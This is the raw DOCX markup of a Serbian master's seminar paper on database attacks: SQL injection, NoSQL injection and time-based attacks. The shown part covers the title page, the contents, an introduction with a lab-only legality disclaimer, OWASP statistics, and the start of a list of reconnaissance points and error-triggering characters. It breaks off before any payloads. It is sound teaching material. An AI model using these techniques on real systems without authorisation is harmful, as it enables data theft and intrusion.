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anchor allowOverlap="1" behindDoc="0" distB="114300" distT="114300" distL="114300" distR="114300" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="868521" cy="868521"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone/>
            <wp:docPr id="38"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868521" cy="868521"/>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UNIVERZITET U NIŠU</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor allowOverlap="1" behindDoc="0" distB="114300" distT="114300" distL="114300" distR="114300" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="885825" cy="885825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27"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885825" cy="885825"/>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ELEKTRONSKI FAKULTET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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KATEDRA ZA RAČUNARSTVO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">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6"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SEMINARSKI RAD</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Napadi na baze podataka</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SQL Injection, NoSQL Injection, Timing Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">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2"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Master akademske studije</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Studijski program:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Računarstvo i informatika</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">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Modul:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bezbednost računarskih sistema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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0"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Predmet:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistemi za upravljanje bazama podataka</w:t>
      </w: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Profesor:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Student:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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6"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prof. dr Aleksandar Stanimirović</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Teodora Kalezić, 1929</w:t>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Sadržaj</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="408261051"/>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lth4ddk2m1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UVOD</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23nesy8f4u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SQL INJECTION (SQLi) NAPADI</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zz1nqj4py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Otkrivanje mogućnosti za SQLi napadom</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1yeb93lh7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Napadi na logiku upita i čitanje podataka</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y9m9ltqle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Otkrivanje skrivenih podataka</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ignls53jz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Zaobilazaženje logike upita - Autentifikacija</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8wtf6e5v7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2.2.3 Otkrivanje podataka iz drugih tabela</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z3wpm45fxf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UNION napadi</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jfdcg8s9lf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Određivanje broja kolona originalnog upita</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26yn3ko4m0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Određivanje kompatibilnih tipova podataka između kolona</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2w3dr6vofy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Primer - demonstracija UNION napada</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7odfs3wae1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Upiti za prikupljanje informacija o bazi podataka</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xcdhrg3e4a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Verzija baze podataka</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5k54pomyj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Informacije o tabelama</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ghiqyrl6fa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Prikaz korisnika i privilegija</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wiw5uwznxm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2.2.4 Blind SQLi</w:t>
              <w:tab/>
              <w:t xml:space="preserve">18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5m34g6wfr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Boolean-based napadi</w:t>
              <w:tab/>
              <w:t xml:space="preserve">18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62ccvcekor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Error-based napadi</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72pifj13gm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Time-based napadi</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si6yes09mg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Out-of-Band napadi</w:t>
              <w:tab/>
              <w:t xml:space="preserve">22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xj6xelqr2e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Napadi sa ciljem manipulacije baze podataka</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23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932o23lw2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Remote Code Execution (RCE) preko SQLi</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9yq3juw1pk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Prevencija SQLi napada</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3hpwn8l2lo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NoSQL INJECTION (NoSQLi) NAPADI</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676x72gtd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Syntax Injection</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5n4aa7oqh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Otkrivanje vrednosti atributa</w:t>
              <w:tab/>
              <w:t xml:space="preserve">30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cpkl93gno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Time-based napadi</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5mi35w8et5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Operator Injection</w:t>
              <w:tab/>
              <w:t xml:space="preserve">33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t5uu42xpz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Prevencija NoSQLi napada</w:t>
              <w:tab/>
              <w:t xml:space="preserve">34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w9vnvf0w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ZAKLJUČAK</w:t>
              <w:tab/>
              <w:t xml:space="preserve">36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qavxoj7xu7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LITERATURA</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46">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_alth4ddk2m1y" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. UVOD</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Cilj ovog rada je obrada jednog od najčešćih tipova napada informacionih sistema koji ciljaju baze podataka. Kategorija ovih napada se naziva </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection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SQLi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) u slučaju relacionih baza podataka, odnosno </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NoSQL Injection </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">u kontekstu NoSQL baza podataka. Osim osnovnih podkategorija ovih napada, biće demonstriran princip Timing napada (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Timing Attacks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), konkretno kroz </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-based</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> napade koji koriste vreme izvršenja kao način izvođenja zaključaka o ciljanom sistemu i podacima unutar njega.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Neophodno je napomenuti da će se napadi izvršavati isključivo na lokalnim okruženjima, specijalno pripremljenim za demonstraciju ranjivosti, gde je eksploatacija legalna i legitimna. Navedeni primeri i metodologije se koriste isključivo u edukativne svrhe i strogo se zabranjuje njihova primena nad neautorizovanim sistemima bez eksplicitne dozvole vlasnika. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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uvoda, u drugom poglavlju će biti obrađeni SQLi napadi, načini na koje je moguće otkriti potencijalne ranjivosti u ciljanom sistemu, kao i primeri eksploatacije istih. Na kraju će biti reči o mehanizmima zaštite od ovakvih napada.</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trećem poglavlju će biti reči o NoSQLi napadima. Slično kao i u drugom poglavlju, biće definisani načini otkrivanja potencijalnih ranjivosti, primeri, kao i mehanizmi zaštite od ovakvih napada.</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Zaključak će biti dat u četvrtom poglavlju, dok će u petom poglavlju biti navedene korišćene reference.</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Style w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b23nesy8f4ut" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. SQL INJECTION (SQLi) NAPADI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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 osnovu liste deset najčešćih sigurnosnih ranjivosti iz 2021. godine od organizacije </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Worldwide Application Security Project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OWASP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koja se bavi dokumentovanjem, izradom alata i istraživanjem u oblasti veb i aplikativne sigurnosti, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> napadi se nalaze na trećem mestu. Iako su ovi napadi u verziji iz 2017. godine bili na prvom mestu, još uvek predstavljaju jako čest i ozbiljan problem u praksi.</w:t>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Prema njihovom izveštaju, Injection ranjivosti su proverene u 94% aplikacija. U proseku su činile oko 3% svih pronađenih ranjivosti po aplikaciji, dok su u pojedinim slučajevima predstavljale čak 19%. Ukupno je zabeleženo skoro 275.000 takvih ranjivosti. U ovu kategoriju spadaju ranjivosti poput </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-site Scripting</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XSS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SQL Injection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SQLi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External Control of File Name or Path </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kategorije napada.</w:t>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Među Injection ranjivostima, SQL Injection direktno cilja baze podataka. Uspešan SQLi napad može dovesti do narušavanja svakog aspekta </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CIA Triad</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> modela, koji govori o poverljvosti (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confidentiality</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), integritetu (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrity</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) i dostupnosti (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Availability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) podataka u svetu informacione sigurnosti. </w:t>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Prilikom eksploatacije SQLi ranjivosti, namera je manipulacija upita koji je korišćen od strane baze podataka servisa ili aplikacije. Konkretno, cilj je umetanje (,,injekcija’’) specifično kreiranog teksta (u nastavku </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) kako bi se promenila ili zaobišla logika upita i kao rezultat dobili podaci koji nisu predviđeni, ili zaobišla sama aplikativna logika. Na primer, moguće je doći do privatnih podataka kao što su bankovne informacije, dok bi primer zaobilaženja aplikativne logike mogla biti </w:t>
      </w:r>
      <w:hyperlink w:anchor="_u1ignls53jz5">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">neadekvatno implementirana forma za autentifikaciju korisnika</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Uprkos dokumentaciji i mehanizmima zaštite, SQLi napadi su i dalje u velikoj meri prisutni zbog kompleksnosti aplikativne logike, nedovoljnog testiranja i programerskih propusta. Tokom godina razvijeni su različiti oblici ovih napada, dok će u nastavku biti obrađeni najčešći, kao i primeri eksploatacije.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_spzz1nqj4pyz" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Otkrivanje mogućnosti za SQLi napadom </w:t>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Pre same eksploatacije SQLi ranjivosti je neophodno uraditi ,,izviđanje’’ (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), kako bi se otkrile tačke gde je potencijalno moguće izvršiti napad.</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Uobičajena mesta za proveru uključuju:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">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Forme za autentifikaciju</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">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Forme koje prihvataju korisnički unos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">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parametre</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP zaglavlja (npr. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User-Agent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Referer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Cookie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Ponašanja koja mogu ukazati na prisustvo SQLi ranjivosti su:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">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Poruke koje ukazuju na greške, npr: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL syntax error near…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Greške i/ili neočekivano ponašanje prilikom obrade SQL-specifičnih karaktera i izraza, neki od kojih su:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>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Apostrof ( </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 koji obično služi za ograničavanje stringova,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>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Tačka-zarez ( </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 koji označava kraj SQL upita,</w:t>
      </w:r>
    </w:p>
